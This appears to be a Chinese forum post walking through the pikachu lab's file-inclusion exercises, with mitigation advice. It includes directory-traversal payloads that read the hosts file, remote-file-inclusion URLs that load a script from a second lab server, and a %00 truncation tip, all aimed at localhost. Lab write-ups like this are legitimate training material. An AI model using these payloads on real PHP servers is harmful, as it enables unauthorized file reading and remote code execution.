Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

pikachu file include——文件包含靶场练习

 Share


KaiWn

Recommended Posts

文件包含本质就是代码注入,原理:注入一段用户能够控制的脚本或代码,让服务器端执行。

1.本地文件包含漏洞——能够打开并包含本地文件的漏洞

测试pikachu文件包含靶场:

①随机选择,出现文件包含

http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename=file2.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#

2746834-20220813110640656-1131494715.png

②修改file2.php可以造成文件读取(结合目录遍历漏洞,如果被过滤可改变编码方式)
尝试读取本机host文件

 ../../../../Windows/System32/drivers/etc/hosts

由于不知道文件包含几级路径,因此多次尝试增.//

http://127.0.0.1/pikachu-master/vul/fileinclude/fi_local.php?filename= ../../../../../Windows/System32/drivers/etc/hosts
&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2#

③成功获取本地HOST

2746834-20220813110430984-583008781.png

④漏洞避免

a.避免目录遍历漏洞:

开启open_basedir,作用限制在某个特定目录下PHP能打开的文件,作用与safe_mode是否开启无关。

注意:open_basedir的值是目录的前缀。

b.避免任意文件包含:

尽量避免包含动态的变量,尤其是用户可以控制的变量。

如:open_basedir值采用枚举方式,PHP可打开的文件被枚举出来,也就避免了任意文件包含的风险。

2.远程文件包含

 如果PHP配置选项allow_url_include为ON,则include/require函数可以加载远程文件,即存在远程文件包含漏洞。

测试pikachu文件包含靶场:

①随便打开一个文件

http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=include%2Ffile1.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

发现存在远程包含漏洞filename=include/

②在本地测试环境中,新开一个靶场当做攻击服务器(sqli-labs靶场)

攻击服务器脚本地址;

http://127.0.0.1/sqli-labs-master/www.php

③在pikachu靶场中远程加载脚本文件:

http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/sqli-labs-master/www.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

④效果:

2746834-20220820103621937-350598326.png

⑤也可采用目录遍历:

http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=../../../../../../../www.php&submit=%E6%8F%90%E4%BA%A4%E6%9F%A5%E8%AF%A2

效果:

2746834-20220820103749504-1562062633.png

 

 ⑥如果文件无法正确加载解析,可尝试在URL中使用%00截断(利用远程文件包含常用技巧)

 

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...